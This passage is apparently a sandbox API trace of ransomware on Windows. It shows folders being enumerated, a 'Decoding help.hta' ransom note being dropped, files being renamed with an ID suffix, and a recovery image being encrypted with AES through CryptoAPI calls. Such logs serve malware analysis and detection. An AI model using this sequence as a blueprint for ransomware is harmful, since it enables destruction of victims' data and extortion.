lpString2="Winre.wim") returned -1 [0041.883] lstrlenW (lpString="Winre.wim") returned 9 [0041.884] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0041.884] lstrlenW (lpString="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned 56 [0041.884] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="Winre.wim" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0041.884] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0041.884] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.[ID]g9uZrLhJaygpwRm1[ID]" [0041.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.029] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4ec [0042.029] CreateFileMappingA (hFile=0x4ec, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4f0 [0042.029] CryptAcquireContextA (in: phProv=0x3d0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3d0fcec*=0x344a2c0) returned 1 [0045.313] CryptGenKey (in: hProv=0x344a2c0, Algid=0x6610, dwFlags=0x1, phKey=0x3d0fce8 | out: phKey=0x3d0fce8*=0x5d7c90) returned 1 [0045.313] CryptExportKey (in: hKey=0x5d7c90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3d0fbe4, pdwDataLen=0x3d0fce4 | out: pbData=0x3d0fbe4*, pdwDataLen=0x3d0fce4*=0x2c) returned 1 [0045.313] MapViewOfFile (hFileMappingObject=0x4f0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x14e60000 [0045.784] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d0fbe4*, pdwDataLen=0x3d0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3d0fbe4*, pdwDataLen=0x3d0fcf8*=0x100) returned 1 [0048.919] CryptEncrypt (in: hKey=0x5d7c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x14e60000, pdwDataLen=0x3d0fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x14e60000*, pdwDataLen=0x3d0fce4*=0x100000) returned 1 [0049.514] UnmapViewOfFile (lpBaseAddress=0x14e60000) returned 1 [0049.586] CloseHandle (hObject=0x4f0) returned 1 [0049.586] CryptDestroyKey (hKey=0x5d7c90) returned 1 [0049.586] CryptReleaseContext (hProv=0x344a2c0, dwFlags=0x0) returned 1 [0049.586] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.586] WriteFile (in: hFile=0x4ec, lpBuffer=0x3d0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3d0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x3d0fbe4*, lpNumberOfBytesWritten=0x3d0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.095] WriteFile (in: hFile=0x4ec, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3d0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3d0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.095] CloseHandle (hObject=0x4ec) returned 1 [0060.375] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.863] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3d0fd30 | out: lpFindFileData=0x3d0fd30*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0061.864] FindClose (hFindFile=0x5a5430) Thread: id = 42 os_tid = 0xadc [0039.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*.*", lpFindFileData=0x508fd30 | out: lpFindFileData=0x508fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 43 os_tid = 0xae0 [0039.184] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*", lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.184] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.184] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.184] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.184] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.184] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.184] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.184] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.184] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.184] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US" [0039.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0039.184] GlobalMemoryStatus (in: lpBuffer=0x51cfd10 | out: lpBuffer=0x51cfd10) [0039.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4178320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0039.200] CloseHandle (hObject=0x1ac) returned 1 [0039.200] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a37297, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a37297, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2a5d3f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0039.200] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.200] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.200] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0xffffffff [0039.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0039.201] WriteFile (in: hFile=0x1ac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x51cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x51cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.202] CloseHandle (hObject=0x1ac) returned 1 [0039.202] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.202] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ExtExport.exe") returned -1 [0039.202] lstrlenW (lpString="ExtExport.exe") returned 13 [0039.202] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.202] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.202] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="ExtExport.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe" [0039.202] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe" [0039.202] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.202] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files (x86)\\internet explorer\\extexport.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\extexport.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.210] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2be033e8, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2be033e8, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x90894420, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0039.210] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.210] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.210] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.210] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hmmapi.dll") returned -1 [0039.210] lstrlenW (lpString="hmmapi.dll") returned 10 [0039.210] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.210] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.210] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="hmmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll" [0039.210] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll" [0039.210] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\hmmapi.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\hmmapi.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.210] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f46f7c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xd7f46f7c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xd7f6d0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x0, dwReserved1=0x0, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0039.210] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.210] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.210] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.210] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ie8props.propdesc") returned -1 [0039.210] lstrlenW (lpString="ie8props.propdesc") returned 17 [0039.210] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.211] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="ie8props.propdesc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" [0039.211] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" [0039.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc.[ID]g9uZrLhJaygpwRm1[ID]" [0039.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.211] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22549a9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22549a9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb22a0c69, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0039.211] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.211] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.211] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iecompat.dll") returned -1 [0039.211] lstrlenW (lpString="iecompat.dll") returned 12 [0039.211] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.211] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="iecompat.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll" [0039.211] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll" [0039.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files (x86)\\internet explorer\\iecompat.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\iecompat.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.211] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb22ecf2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb22ecf2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23391ea, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0039.211] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.211] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.211] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.212] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iedvtool.dll") returned -1 [0039.212] lstrlenW (lpString="iedvtool.dll") returned 12 [0039.212] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.212] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.212] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="iedvtool.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll" [0039.212] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll" [0039.212] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files (x86)\\internet 